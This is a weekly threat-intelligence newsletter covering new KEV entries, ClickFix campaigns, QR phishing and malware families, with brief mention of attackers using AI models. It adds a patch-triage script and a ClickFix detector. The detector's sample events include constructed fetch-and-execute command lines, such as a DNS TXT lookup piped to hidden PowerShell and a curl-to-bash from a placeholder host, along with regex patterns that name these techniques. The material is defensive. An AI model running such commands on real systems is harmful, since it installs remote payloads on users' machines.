
Cyber Threat Weekly – #116

Derek Krein
5 min read

The week of February 9th through February 15th, about 375 cyber news articles were reviewed. A light amount of cyber threat trends and adversarial behavior news to share.  Been thinking about the art and science of simplicity.

It’s interesting when you dive into the principle of simplicity.  Why art and science?  A quote attributed to Albert Einstein: “If you can’t explain it simply, you don’t understand it well enough.”  Simplification is easier said than done.  Speaking simply means breaking things down into manageable, easily understood terms and communicating complex systems simply.  It feels like we have a complexity problem in security, and in tech in general.

Let’s start with Pastebin comments leading to a ClickFix-style attack.  Another ClickFix-style attack, this one Domain Name System (DNS) based.  Snail mail leads to QR code phishing.  Researchers provide a deeper dive into QR code phishing.

Claude LLM artifacts + malvertising leading to a ClickFix-style campaign.  BeyondTrust bug exploited after exploit code was released.  Nation state threat actors abusing the Gemini AI model.  LummaStealer coming back via CastleLoader and ClickFix.

A sneak peek into Scattered Spider’s playbook.  New ZeroDayRAT mobile device malware.


Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!

Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months.  We continue to share n-day vulnerabilities being actively exploited.  Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs.  If it’s in the catalog, it should be patched.

A close #2 priority is flaws with weaponized proof of concept (PoC) code available.  The chance of exploitation is higher once weaponized PoC code is public.  If you do nothing else with patching, have an emergency 24-to-48-hour patching process for actively exploited vulnerabilities and for those with weaponized PoC code available.

VPN gateways from all vendors are under constant attack.

You should consider what is exposed to the Internet.  Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.
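As an added example (not code from the newsletter), here is how the priority scheme above can be turned into a triage step: anything in the KEV catalog is priority 1, anything with weaponized PoC code is priority 2, and both get the emergency window.  The KEV records use the field names of the CISA KEV JSON feed, but the entries, the weaponized-PoC list and the asset inventory are constructed for illustration, and the 24-hour window for internet-exposed assets (48 hours for everything else) is this example's own refinement of the 24-to-48-hour process.

```python
"""Patch-priority triage: KEV first, weaponized PoC second, everything else after.

Added example, not from the newsletter. KEV records mirror the field names of the
CISA KEV JSON feed (cveID, vendorProject, product, dateAdded, dueDate); the
entries, the PoC list and the inventory below are constructed for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed KEV snippet (same shape as the CISA feed; dates are illustrative).
KEV_FEED = {
    "vulnerabilities": [
        {"cveID": "CVE-2026-1731", "vendorProject": "BeyondTrust",
         "product": "Remote Support / Privileged Remote Access",
         "dateAdded": "2026-02-10", "dueDate": "2026-02-17"},
        {"cveID": "CVE-2025-15556", "vendorProject": "Notepad++",
         "product": "Notepad++", "dateAdded": "2026-02-12", "dueDate": "2026-03-05"},
    ]
}

# Constructed: CVEs with weaponized public PoC code. In practice this comes
# from an exploit-intel source such as VulnCheck or your own tracking.
WEAPONIZED_POC = {"CVE-2026-1731", "CVE-2025-0001"}

# Constructed asset inventory: which CVEs each asset is exposed to.
INVENTORY = [
    {"asset": "bt-pra-01", "internet_exposed": True,  "cves": ["CVE-2026-1731"]},
    {"asset": "wks-0042",  "internet_exposed": False, "cves": ["CVE-2025-15556", "CVE-2025-0001"]},
    {"asset": "wks-0043",  "internet_exposed": False, "cves": ["CVE-2025-9999"]},
]


@dataclass(order=True)
class Finding:
    priority: int          # 1 = in KEV, 2 = weaponized PoC public, 3 = routine
    deadline: datetime
    asset: str
    cve: str
    reason: str


def triage(inventory, kev_feed, weaponized, now):
    """Return findings sorted by priority, then by deadline."""
    kev = {v["cveID"]: v for v in kev_feed["vulnerabilities"]}
    findings = []
    for host in inventory:
        for cve in host["cves"]:
            if cve in kev:
                # Priority 1: actively exploited. Emergency window of 24h for
                # internet-facing assets, 48h otherwise (assumption of this
                # example), and never later than the catalog's own due date.
                hours = 24 if host["internet_exposed"] else 48
                catalog_due = datetime.fromisoformat(kev[cve]["dueDate"]).replace(tzinfo=timezone.utc)
                deadline = min(now + timedelta(hours=hours), catalog_due)
                findings.append(Finding(1, deadline, host["asset"], cve, "in KEV catalog"))
            elif cve in weaponized:
                # Priority 2: weaponized PoC public, same 48h emergency window.
                findings.append(Finding(2, now + timedelta(hours=48), host["asset"], cve,
                                        "weaponized PoC code public"))
            else:
                # Everything else goes through the routine patch cycle.
                findings.append(Finding(3, now + timedelta(days=30), host["asset"], cve,
                                        "routine patch cycle"))
    return sorted(findings)


def emergency_queue(findings):
    """Subset that must go through the 24-to-48-hour emergency process."""
    return [f for f in findings if f.priority <= 2]


def run_example(now_iso="2026-02-16T00:00:00+00:00"):
    """Run triage on the constructed data at a fixed reference time."""
    now = datetime.fromisoformat(now_iso)
    return triage(INVENTORY, KEV_FEED, WEAPONIZED_POC, now)


if __name__ == "__main__":
    for f in run_example():
        print(f"P{f.priority} {f.asset:10} {f.cve:15} due {f.deadline:%Y-%m-%d %H:%M} ({f.reason})")
```

The KEV due date is an upper bound, not the target: the emergency window usually lands well before it, and the catalog date only wins when the entry is already days old.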


CISA Known Exploited Vulnerabilities – February 9th to February 15th:

CVE-2026-21513 – Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability:
Could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21525 – Microsoft Windows NULL Pointer Dereference Vulnerability:
Could allow an unauthorized attacker to deny service locally.

CVE-2026-21510 – Microsoft Windows Shell Protection Mechanism Failure Vulnerability:
Could allow an unauthorized attacker to bypass a security feature over a network.

CVE-2026-21533 – Microsoft Windows Improper Privilege Management Vulnerability:
Could allow an authorized attacker to elevate privileges locally.

CVE-2026-21519 – Microsoft Windows Type Confusion Vulnerability:
Could allow an authorized attacker to elevate privileges locally.

CVE-2026-21514 – Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability:
Could allow an authorized attacker to elevate privileges locally.

CVE-2026-20700 – Apple Multiple Buffer Overflow Vulnerability:
Could allow an attacker with memory write capability to execute arbitrary code.  Affects Apple iOS, macOS, tvOS, watchOS, and visionOS.

CVE-2024-43468 – Microsoft Configuration Manager SQL Injection Vulnerability:
An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database.

CVE-2025-15556 – Notepad++ Download of Code Without Integrity Check Vulnerability:
Could allow an attacker to intercept or redirect update traffic to download and execute an attacker-controlled installer. This could lead to arbitrary code execution with the privileges of the user.

CVE-2025-40536 – SolarWinds Web Help Desk Security Control Bypass Vulnerability:
Could allow an unauthenticated attacker to gain access to certain restricted functionality.

CVE-2026-1731 – BeyondTrust Remote Support (RS) and Privileged Remote Access (PRA) OS Command Injection Vulnerability:
Could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user. Successful exploitation requires no authentication or user interaction and may lead to system compromise, including unauthorized access, data exfiltration, and service disruption.


Comments Based ClickFix Attack – Pastebin

While not the first comment-based attack, this one stands out a bit.  It is social engineering through and through: comments promote a supposed cryptocurrency exploit, and the ClickFix step is JavaScript rather than a shell command.  The comments lead to a guide that directs the victim to execute the JavaScript directly in their own web browser.

https://www.bleepingcomputer.com/news/security/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps/


DNS-Based ClickFix Style Attack

Another novel use of ClickFix-style social engineering.  This one abuses the Windows command prompt: the victim pastes a DNS lookup command that queries attacker-owned infrastructure.  The payload retrieved that way initiates an attack chain ultimately leading to a remote access trojan.

https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html


Crypto Theft via Snail Mail and QR Codes

While this campaign targets crypto theft, the technique can be used across the board for pretty much anything.  The attackers’ goal is to social engineer victims into taking an action.  Snail mail is unassuming, and it sends victims to their cell phones, which often have minimal protections.

https://www.bleepingcomputer.com/news/security/snail-mail-letters-target-trezor-and-ledger-users-in-crypto-theft-attacks/


Researchers Dive into QR Code Phishing

QR codes are a great way for attackers to catch victims off guard.  We are used to seeing them everywhere; attackers know this and take advantage.  By moving traffic to mobile phones, there is a greater chance of attack success.

https://unit42.paloaltonetworks.com/qr-codes-as-attack-vector/


Legit Infrastructure (LLM Artifacts) + Malvertising = ClickFix

The abuse of legitimate resources continues, this time a combination of malvertising and Claude artifacts.  Even Medium articles were abused.  Each provides instructions for pasting a shell command into the Terminal on Mac devices.

https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
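The two ClickFix variants above (a DNS lookup pasted into the Windows command prompt, and a shell one-liner pasted into the macOS Terminal) share a detectable shape in process-creation telemetry: a fetch-then-execute command launched from an interactive parent.  The following is an added detection example, not code from the newsletter or from the cited reports.  The event records, the regex heuristics and the list of interactive parent processes are this example's own assumptions, and the sample commands are constructed rather than either campaign's actual command.

```python
"""Flag ClickFix-style command lines in process-creation events.

Added example, not from the newsletter or the cited reports. The events are
constructed to resemble Sysmon/EDR process-creation records; the patterns are
this example's own heuristics for the behaviours described above, not a
reproduction of either campaign's actual command.
"""
import re

# Constructed sample events: (host, parent image, command line).
EVENTS = [
    ("wks-0042", r"C:\Windows\explorer.exe",
     "cmd.exe /c for /f \"tokens=*\" %i in ('nslookup -type=txt verify.example.invalid') "
     "do powershell -w hidden -c \"%i\""),
    ("mac-17", "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "/bin/zsh -c \"curl -fsSL https://update.example.invalid/fix.sh | bash\""),
    ("wks-0043", r"C:\Windows\explorer.exe",
     "cmd.exe /c nslookup www.example.com"),                       # benign lookup
    ("srv-01", r"C:\Program Files\Backup\agent.exe",
     "powershell.exe -NoProfile -File C:\\Scripts\\rotate-logs.ps1"),  # scheduled job
]

# Heuristics (assumptions of this example): (name, regex over the command line).
PATTERNS = [
    # DNS TXT answer fed into a shell: nslookup ... -type=txt ... powershell/cmd/mshta
    ("dns-txt-to-shell", re.compile(
        r"nslookup\b.*?(-type=txt|-q=txt|-querytype=txt).*?\b(powershell|cmd|mshta|wscript)\b",
        re.I | re.S)),
    # curl/wget output piped straight into a shell
    ("fetch-pipe-shell", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)),
    # PowerShell with a base64 encoded command
    ("encoded-powershell", re.compile(
        r"powershell[^\n]*\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    # mshta pulling a remote HTA
    ("mshta-remote", re.compile(r"\bmshta(\.exe)?\s+https?://", re.I)),
]

# Parents that indicate a user-typed (pasted) command rather than a service or
# scheduled launch. Assumption of this example; extend to your own terminal apps.
INTERACTIVE_PARENTS = ("explorer.exe", "Terminal", "iTerm2", "WindowsTerminal.exe")


def interactive(parent_image):
    """True if the parent image name is one of the interactive launchers."""
    name = parent_image.rsplit("\\", 1)[-1].rsplit("/", 1)[-1]
    return name in INTERACTIVE_PARENTS


def classify(event):
    """Return a finding dict for a suspicious event, or None if nothing matched."""
    host, parent, cmdline = event
    hits = [name for name, rx in PATTERNS if rx.search(cmdline)]
    if not hits:
        return None
    # A matching pattern from an interactive parent is the ClickFix shape: the
    # user was talked into pasting it. Other parents are still reported, lower.
    severity = "high" if interactive(parent) else "medium"
    return {"host": host, "severity": severity, "patterns": hits, "cmdline": cmdline}


def scan(events):
    """Classify every event and keep only the suspicious ones."""
    return [c for c in (classify(e) for e in events) if c]


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(f"[{finding['severity']}] {finding['host']}: {finding['patterns']}")
        print(f"    {finding['cmdline']}")
```

The plain `nslookup` on the third host is deliberately not flagged: the signal is the lookup result being handed to an interpreter, not the lookup itself, which keeps the rule quiet on ordinary troubleshooting.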


After Exploit Code Released, BeyondTrust Bug Targeted

This one is for tracking purposes.  It has been the case for years: threat actors go after bugs shortly after proof-of-concept (PoC) code is released.  We are really interested in that behavior, whether it is reverse engineering patches or exploiting a bug right after exploit release, so we can plan our operations accordingly.

https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/


Nation State Threat Actors Abusing Gemini

We have seen several reports on how threat actors are abusing frontier large language models to aid in attacks.  Google has released a report detailing more activity around using generative AI for reconnaissance, malware development, and more.

https://www.infosecurity-magazine.com/news/nation-state-hackers-gemini-ai/

https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/


CastleLoader + ClickFix = LummaStealer Infections Surging

After a law enforcement takedown and severe disruption, it appears LummaStealer is coming back and spreading rapidly.  CastleLoader is a capable malware loader that decrypts, loads, and executes LummaStealer in memory.

https://www.bleepingcomputer.com/news/security/lummastealer-infections-surge-after-castleloader-malware-campaigns/

https://www.bitdefender.com/en-us/blog/labs/lummastealer-second-life-castleloader


Scattered Spider’s Playbook via Incident Response

Researchers share some of the behavior of this infamous threat group.  The players may change (largely English speakers from a loose collective called “The Com”), but their use of social engineering and living-off-the-land techniques is worth digging into.

https://unit42.paloaltonetworks.com/muddled-libra-ops-playbook/


ZeroDayRAT Malware – Spyware, Surveillance, and Info-Stealing

Near nation-state-level capabilities, packaged up and sold on Telegram.  Everything needed for account takeover, financial or cryptocurrency theft, SMS message interception (think 2FA codes), and more.  While pricey at $2,000, this is a commoditized capability accessible to many.

https://www.darkreading.com/threat-intelligence/zerodayrat-brings-commercial-spyware-to-mass-market

https://iverify.io/blog/breaking-down-zerodayrat—new-spyware-targeting-android-and-ios

